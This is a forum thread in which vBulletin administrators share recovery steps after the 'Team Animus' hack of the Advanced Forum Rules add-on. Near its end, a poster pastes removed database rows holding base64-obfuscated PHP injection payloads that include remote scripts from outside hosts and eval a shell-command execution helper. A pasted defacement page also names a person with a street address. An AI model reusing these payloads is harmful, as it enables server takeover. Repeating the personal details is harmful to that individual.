If your forums has been hacked by "Team Animus", please read this to get helped to remove hacking traces and make your forums secure.

NOTE: Please be careful when removing any data. Make sure you have backups of your important files and databases!

What they did:
1. Added vba.php to INCLUDES folder
2. Replaced several index.php files, added some index.html files
3. Added new user with ID "13371338", admin status
4. Changed user titles to "Hacked by Team Animus"
5. Disabled current admins
6. Disabled forums

Here is what I have done:
01. MyAdmin > Deleted latest user (hacker - admin group)
02. MyAdmin > Changed autoincrement value in USER table to {LatestUserID} + 1
03. MyAdmin > Executed two queries to fix user titles:
UPDATE user SET usertitle = replace(usertitle, "Hacked by Team Animus", "");
UPDATE user SET customtitle = '0' where customtitle = '1';
04. FTP > To be sure that all files are OK, I've deleted everything from my forum folder, except:
images, banners, .htaccess, favicon, config.php (re-checked content of this one, just in case)
05. FTP > Uploaded original forum files + custom .php's which belongs to add-ons I'm using
06. FTP > Uploaded tools.php, restored my admin status, enabled forums
07. FTP > Deleted tools.php and /install/install.php
08. ACP > Removed "Skimlinks Plugin" (who installed this? hacker?) - Edit: added by vB in 4.1.3
09. ACP > Updated "VSa - Advanced Forum Rules" add-on (download latest version: vB3.x (https://vborg.vbsupport.ru/showthread.php?t=201312), vB4.x (https://vborg.vbsupport.ru/showthread.php?t=236069))
10. ACP > Re-imported all add-ons I'm using, with "overwrite" checked, to ensure there are no modified codes
11. ACP > Maintenance > update user titles, fix broken user profiles, repair and optimize tables


If you have any questions, feel free to ask.

And again: Make sure you have backups of your important files and databases before you delete anything!

ok, so I went to

user>operations>changed the user number to be correct>hit "go"

And it reverts right back to the 13371341

Any ideas?

It should be {LatestUserID} + 1.

Check user ID of your latest regular user (sort rows by user id desc). Let's say its 456.
Go to USER table > Operations > change AUTO_INCREMENT to 457.

nevermind, I missed 3 new registrants.

I'm still wondering how they added files.

There must be something more than Forum Rules add-on.

If they breached the db because of the exploit it would be nothing to get to the server from there, I would think.

Oh, and this is legit:

08. ACP > Removed "Skimlinks Plugin" (who installed this? hacker?)

It was added in 4.1.3, I think.

Great share, I wasn't attacked thank god.

Not every site had the same things done to it honestly. Having cleaned a number of them, lots of different things were done to different sites, not all steps were done to all of the sites. It would be in your best intrests to RESTORE A BACKUP, or contact vBulletin support for help.

my forum has also been hacked by 2 different groups, one just did a quick and simple redirect, the other has for the moment taken control and somehow they are redirecting everything to their server, my server admin isnt around at the moment so im totally at a loss how to kill them off

ive been hacked by http://pro2leet.net/forum.php and http://belegit.net/forum/ and both these sites use vbulletin software

We were lucky in that (Australian time) the hack attack occurred in the early morning but after our daily 3am backup.

I changed passwords, I deleted all the newly updated files, I replaced them from original source, restored from the 3am backup - all good.
We only lost a handful of threads and posts, but it was the safest option IMHO.

Lessons?
1. Have a daily backup!
2. Have all the source code safe somewhere else.
3. Take more time to eyeball add-on code

Note: Valter's code has been around for years. NO ONE noticed the problem until now.

It's very easy to visually check all form fields and SQL in an addon; checking that vB cleaning and escape_string have been applied.
We (Admins) all need to be vigilant, no point blaming anyone, TeamAnimus have done us a favour by making us take security seriously.
Not that I would object to tasking Seal Team 6 onto TeamAnimus :D


Kym

--------------- Added 1304639047 at 1304639047 ---------------

my forum has also been hacked by 2 different groups, one just did a quick and simple redirect, the other has for the moment taken control and somehow they are redirecting everything to their server, my server admin isnt around at the moment so im totally at a loss how to kill them off

ive been hacked by http://pro2leet.net/forum.php and http://belegit.net/forum/ and both these sites use vbulletin software

Once the vba.php trojan is there, anyone can use it to hack your system. :eek:
Sounds like a piggy back attack to me. :(

I've got hacked. I hope I got it back, but for some reason my "user titles" are gone. Like "junior fellow" "senior fellow" etc. Any suggestion? I tried to repair tables etc, but not to avail.

Tx

EB

I'm still wondering how they added files.

There must be something more than Forum Rules add-on.

After they got into the Admin Panel they could have easily add a plugin which would allow them to upload something on the site, i.e php shell for modifying of the current files, or uploading of the newer files.

I've got hacked. I hope I got it back, but for some reason my "user titles" are gone. Like "junior fellow" "senior fellow" etc. Any suggestion? I tried to repair tables etc, but not to avail.

Tx

EB
1. Go in (phpMyAdmin) or SSH connecting
2. Open table user
3. Run SQL query
UPDATE user SET customtitle = '0' where customtitle = '1'
4. Then: Update the counters - Update User Titles and Ranks

Thanks for all your help Valter.

Was everyone who got hacked using the Advanced Forum Rules?\

Was everyone who got hacked using the Advanced Forum Rules?\

i was only using that mod and the vb forums - nothing else. so to me, it's clear what it was. lesson learned. i will never us another mod again. yes, really.

Since updating this poor mod Cyb - Advanced Forums Rules I've followed the above and all looked great until today.

Came hole from work and I could not find my forum so I FTPed in and all my files, the lot have been removed and site is now no more. Team Animus was the original hackers but I think they installed a backdoor and then regained access and deleted the lot.

Not happy because Im not running and backups locally and hoping my host has backups.

May reupload Vbulletin fresh and hope the database is ok.

Regards

Since updating this poor mod Cyb - Advanced Forums Rules I've followed the above and all looked great until today.

That mod is not "poor" in fact as other staff members have posted recently about this subject, the code has been there for years and just now discovered as a exploit the same thing can be said about countless other softwares. Do you see vBulletin being sued for someone not patching their site when a exploit is found? No in fact everyone knows or should know it's falls on you and solely you if not patched. Further more that's just simply not fair to say despite what your going through, YOU installed it correct? Don't get me wrong I'm not saying you can't feel "wronged" I'm simply saying if you point that anger towards someone it should not be Valter's mod you've been using and enjoying for a while now, it should be those who defaced your site respectively.

Point taken.

That mod is not "poor" in fact as other staff members have posted recently about this subject, the code has been there for years and just now discovered as a exploit the same thing can be said about countless other softwares. Do you see vBulletin being sued for someone not patching their site when a exploit is found? No in fact everyone knows or should know it's falls on you and solely you if not patched. Further more that's just simply not fair to say despite what your going through, YOU installed it correct? Don't get me wrong I'm not saying you can't feel "wronged" I'm simply saying if you point that anger towards someone it should not be Valter's mod you've been using and enjoying for a while now, it should be those who defaced your site respectively.

When I try and run the Query and it does not allow me to do so, Where exactly do you have to go and do the Query?

When I try and run the Query and it does not allow me to do so, Where exactly do you have to go and do the Query?

I assume you tried to run it from your Acp, right? You should enter your uid at the can run queries part at the config.php file to be able to run queries from your Acp.

Anyway, you can also run the query at the SQL box at your phpmyadmin in the CP of your host.

I have now been hacked twice. I followed the stated guidlines and updated my CYB - Advanced Forum Rules as well. I have checked all files in FTP and removed any new ones. Also checked the db and deleted the new user.

I do not know what else to do here.

We were attacked again today. Similar attack, but slightly different payload.
VSa - Advanced Forum Rules is the latest version, so I think there is another hole maybe in another plugin.

We were attacked again today. Similar attack, but slightly different payload.
VSa - Advanced Forum Rules is the latest version, so I think there is another hole maybe in another plugin.

What other plugins do you have? Are you sure they didnt leave any backdoors for them to come back the last time they hacked you?

I have several other plugins.
I restored from a backup and re-loaded all scripts and removed vsa.php index.html etc.

The new payload concerns me, similar but different. It did include vsa.php (again)

<head>
<title>hack by liut</title>
<script src="party.js"></script>
</head>
<body bgcolor="black">
<br/><br/>
<center>
<font color="white">make sur u turn up ur speakers so u can here me talk about the hack n express my opinions. btw i hacked slq injector db decriptin passwrds rite now :)</font>
<img src="http://i.imgur.com/QBquY.jpg" />
<object width="0" height="0">
<param name="movie" value="http://www.youtube.com/v/3a56LO3heac&autoplay=1&amp;hl=en_GB&amp;fs=1?color1=0x234900&amp;color2=0x 4e9e00"></param>
<param name="allowFullScreen" value="true"></param>
<param name="allowscriptaccess" value="always"></param>
<embed src="http://www.youtube.com/v/3a56LO3heac&autoplay=1&amp;hl=en_GB&amp;fs=1?color1=0x234900&amp;color2=0x 4e9e00" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="0" height="0">
</embed>
</object>
<object width="0" height="0">
<param name="movie" value="http://www.youtube.com/v/Xi5ZUVP62Iw&autoplay=1&amp;hl=en_GB&amp;fs=1?color1=0x234900&amp;color2=0x 4e9e00"></param>
<param name="allowFullScreen" value="true"></param>
<param name="allowscriptaccess" value="always"></param>
<embed src="http://www.youtube.com/v/Xi5ZUVP62Iw&autoplay=1&amp;hl=en_GB&amp;fs=1?color1=0x234900&amp;color2=0x 4e9e00" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="0" height="0">
</embed>
</object>
<font color="white">Phillip S Roberts<br />
14 Prince's St N<br/>
Exeter, Devon EX2 9AL, UK<br/>
i dar u 2 com get me u lil pussies i been doin mma for 4 months i can tak u</font>
</center>
</body>
</html>


--------------- Added 1305183220 at 1305183220 ---------------

I just found that I had the fist fixed version not the 2nd. Damn!

Yep I've been hacked for the second time too - like the first time I didn't have that user or the vsa.php files etc. Just turned my forum off and removed my admin rights.

I've turned off all extensions for now, while this story pans out.

You guys should check your own computers for issues. Are you using an FTP client that stores your passwords in plain text? Are you using SFTP for connecting to your server?

I think I've noticed another potential problem in Advanced Forum Rules. I've sent a PM to Valter but haven't heard back yet (is there someone else I should contact?)

I think I've noticed another potential problem in Advanced Forum Rules. I've sent a PM to Valter but haven't heard back yet (is there someone else I should contact?)

I think in such cases you can contact the admins here.

Just got the quarantine email, again

Ugh! Again? I just got the email as well. Wonder whats wrong now? >< Poor Valter.

I keep reading "hacked by team Anus".

I think in such cases you can contact the admins here.

For future reference, don't PM. I'm told the correct thing to do would have been to click on "Report this Post" in the mod thread.

I have now been hacked twice. I followed the stated guidlines and updated my CYB - Advanced Forum Rules as well. I have checked all files in FTP and removed any new ones. Also checked the db and deleted the new user.

I do not know what else to do here.

you, me and many others.
uninstall this rotten back door to hell. it is now without a doubt that it has not been fixed, no matter the claims. it's getting to the point where you have to wonder if it's some kind of conspiracy or something. :mad: :down:
it' is not a case where they breached before and were "waiting". i was only hacked after i upgraded to v4.0.4 and not before.

UNINSTALL ANY AND ALL MODS - PERIOD!!

Removing all mods is a little extreme, don't you think?

Removing all mods is a little extreme, don't you think?

While I do understand your frustration about everything, I kind of agree with Boofo here. Uninstalling every mod is a little extreme.

yeah, sure. i suppose you could change that to all cyb mods.
but in my case i only ever used one mod. the cyb afr one. i uninstalled it and also decided to keep my vb forum vanilla. apart from changing colors and stuff from within it, that is it for me. lesson learned. i'm too much a control freak to allow myself to be "violated" again. :P (one rape is enough)

you, me and many others.
uninstall this rotten back door to hell. ...

UNINSTALL ANY AND ALL MODS - PERIOD!!

Might want to try to understand that ANY AND ALL code is susceptible to exploits - hence the reason there are always updates and patches offered (even for operating systems, and vBulletin core software, etc.).


If you were hacked again - you didn't completely purge the server of the exploitable code.

Ensure that all copies of vba.php have been removed:
/forum/includes/vba.php
/forum/includes/xml/vba.php


Also - check (or get your host to check) your server logs for access.

Also - do a full scan of the database; as we had base64 data encoded into the database in the rtable field within the guest table.


Entries I removed:

| guestid | hostip | useragent | lastactive | spider | script | rdata | a33ea4abd15916de0fe47c20e8efc48f | 203.147.62.92 | Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u) | 1278294864 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:262:"echo(base64_decode("ZU5kQQ==").php_uname().base64_decode("ZU5kQQ=="));include(base64_decode("aHR0cDovL3BsYW5ldHdvcmt0ZWFtLmZpbGVhdmUuY29tL2Rkb3 MudHh0Pz8="));include(base64_decode("aHR0cDovL3BsYW5ldHdvcmt0ZWFtLmZpbGVhdmUuY29tL2Rkb3 MudHh0Pz8="));;die();";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i:0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0:"";} |
| 1eafdc25e937348e21e2bb1158b73c48 | 193.71.28.34 | Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u) | 1279528160 | | index | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:278:"echo(base64_decode("Vm9v").php_uname().base64_decode("RG9v"));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2 VzL25ldy9wYm90LnR4dD8="));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2 VzL25ldy9teXNwLnR4dD8="));;die();";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i:0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0:"";} |
| 544953a2c138f10bf32df7677065d1ed | 205.251.131.33 | Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u) | 1279527971 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:278:"echo(base64_decode("Vm9v").php_uname().base64_decode("RG9v"));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2 VzL25ldy9wYm90LnR4dD8="));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2 VzL25ldy9teXNwLnR4dD8="));;die();";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i:0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0:"";} |
| 494edcf8661b32d80c1078019f0f25a7 | 208.64.68.228 | Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u) | 1280926630 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:278:"echo(base64_decode("Vm9v").php_uname().base64_decode("RG9v"));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2 VzL25ldy9wYm90LnR4dD8="));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2 VzL25ldy9teXNwLnR4dD8="));;die();";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i:0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0:"";} |
| 13640f07244b04a849cb78f5c8fc4dbf | 61.47.40.39 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 | 1285330209 | | externalframe | a:9:{s:3:"ref";s:37:"http:/www.t...om/cephcare/contact.php";s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:"eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZW NobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0i ZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZC k7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2Zl KXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaW YoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNm ZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQ plbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykp ew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZW lmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0 YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZX RfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVs c2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG 9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0g QG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw 0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3Blbigk Y2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZi gkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBw Y2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));di e;";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i:0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0:"";} |
| ad7b15b9bdcf0993071e56659d065a9e | 110.45.165.22 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 | 1290781080 | | index | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:"eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZW NobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0i ZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZC k7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2Zl KXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaW YoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNm ZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQ plbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykp ew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZW lmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0 YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZX RfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVs c2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG 9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0g QG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw 0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3Blbigk Y2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZi gkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBw Y2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));di e;";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i:0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0:"";} |
| 23cf7b6e31cd2d81162dc26542cb3f10 | 70.38.37.151 | Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u) | 1290961798 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:278:"echo(base64_decode("Vm9v").php_uname().base64_decode("RG9v"));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2 VzL25ldy9wYm90LnR4dD8="));include(base64_decode("aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWsvaW1hZ2 VzL25ldy9teXNwLnR4dD8="));;die();";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i:0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0:"";} |
| b70f8e63432d70f392cc060fdc411975 | 174.121.219.80 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 | 1294083379 | | showthread | a:8:{s:6:"postid";i:346415;s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:"eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZW NobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0i ZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZC k7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2Zl KXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaW YoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNm ZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQ plbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykp ew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZW lmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0 YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZX RfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVs c2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG 9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0g QG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw 0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3Blbigk Y2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZi gkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBw Y2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));di e;";s:1:"s";s:0:"";s:8:"threadid";i:0;s:7:"forumid";s:3:"156";s:6:"pollid";i:0;s:1:"a";s:0:"";} |
| 51da94725eda052743162729a45c12e4 | 67.192.224.98 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30 | 1294480629 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:919:"eval(base64_decode('ZWNobyAiQkhMVGVhbTxicj4iOwplY2 hvICJzeXM6Ii5waHBfdW5hbWUoKS4iPGJyPiI7CiRjbWQ9ImVj aG8gQmFsaXNvdXJjZSI7CiRlc2VndWljbWQ9ZXgoJGNtZCk7Cm VjaG8gJGVzZWd1aWNtZDsKZnVuY3Rpb24gZXgoJGNmZSl7CiRy ZXMgPSAnJzsKaWYgKCFlbXB0eSgkY2ZlKSl7CmlmKGZ1bmN0aW 9uX2V4aXN0cygnZXhlYycpKXsKQGV4ZWMoJGNmZSwkcmVzKTsK JHJlcyA9IGpvaW4oIlxuIiwkcmVzKTsKfQplbHNlaWYoZnVuY3 Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpewokcmVzID0gQHNo ZWxsX2V4ZWMoJGNmZSk7Cn0KZWxzZWlmKGZ1bmN0aW9uX2V4aX N0cygnc3lzdGVtJykpewpAb2Jfc3RhcnQoKTsKQHN5c3RlbSgk Y2ZlKTsKJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsKQG9iX2 VuZF9jbGVhbigpOwp9CmVsc2VpZihmdW5jdGlvbl9leGlzdHMo J3Bhc3N0aHJ1JykpewpAb2Jfc3RhcnQoKTsKQHBhc3N0aHJ1KC RjZmUpOwokcmVzID0gQG9iX2dldF9jb250ZW50cygpOwpAb2Jf ZW5kX2NsZWFuKCk7Cn0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZi A9IEBwb3BlbigkY2ZlLCJyIikpKXsKJHJlcyA9ICIiOwp3aGls ZSghQGZlb2YoJGYpKSB7ICRyZXMgLj0gQGZyZWFkKCRmLDEwMj QpOyB9CkBwY2xvc2UoJGYpOwp9fQpyZXR1cm4gJHJlczsKfQ== '));die;";s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i:0;s:7:"forumid";i:0;s:6:"pollid";i:0;s:1:"a";s:0:"";} |
| 4fe82d2e1e7c29e795a3d5617e803d3b | 195.42.120.131 | Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 | 1295022885 | | forumdisplay | a:9:{s:1:"f";s:14:"49/contact.php";s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:"eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZW NobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0i ZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZC k7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2Zl KXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaW YoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNm ZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQ plbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykp ew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZW lmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0 YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZX RfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVs c2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG 9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0g QG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw 0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3Blbigk Y2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZi gkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBw Y2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));di e;";s:7:"forumid";i:49;s:1:"s";s:0:"";s:6:"postid";i:0;s:8:"threadid";i:0;s:6:"pollid";i:0;s:1:"a";s:0:"";} |
| 2f85afe9e6bf839981d96c6482d2b90d | 199.124.61.2 | Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/ | 1295771568 | | showthread | a:9:{s:1:"p";s:18:"347103/contact.php";s:14:"send-contactus";s:1:"1";s:11:"author_name";s:965:"eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZW NobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0i ZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZC k7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2Zl KXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaW YoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNm ZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQ plbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykp ew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZW lmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0 YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZX RfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVs c2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG 9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0g QG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw 0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3Blbigk Y2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZi gkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBw Y2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));di e();";s:6:"postid";i:347103;s:1:"s";s:0:"";s:8:"threadid";i:0;s:7:"forumid";s:2:"28";s:6:"pollid";i:0;s:1:"a";s:0:"";} |
| ffb65c6cc094dcbfbb05b96e368d9c53 | 208.91.57.65 | Opera/9.99 (Windows NT 5.1; U; pl) Presto/9.9.9 | 1295778092 | | contact | a:8:{s:14:"send-contactus";s:1:"1";s:11:"author_name";s:963:"eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZW NobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0i ZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZC k7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2Zl KXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaW YoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNm ZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQ plbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykp ew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZW lmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0 YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZX RfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVs c2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG 9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0g QG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw 0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3Blbigk 